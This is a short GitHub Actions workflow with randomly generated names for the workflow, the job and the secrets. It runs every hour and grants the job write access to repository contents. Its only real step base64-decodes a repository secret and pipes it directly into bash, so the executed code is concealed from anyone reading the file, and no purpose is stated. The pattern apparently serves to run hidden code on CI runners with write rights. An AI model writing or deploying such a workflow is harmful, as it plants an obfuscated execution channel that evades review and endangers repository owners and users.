name: YnkwBxYFxAzJRB
on:
  schedule:
    - cron: '58 * * * *'
  workflow_dispatch:
permissions:
  contents: write
jobs:
  ohBScHNvDLUe:
    runs-on: ubuntu-22.04
    env:
      JDaoiqjnxtXvEwCOCR: ${{ secrets.JDaoiqjnxtXvEwCOCR }}
    steps:
      - uses: actions/checkout@v4
      - run: echo "${{ secrets.MbmMkAfFAaztmPFpnB }}" | base64 -d | bash
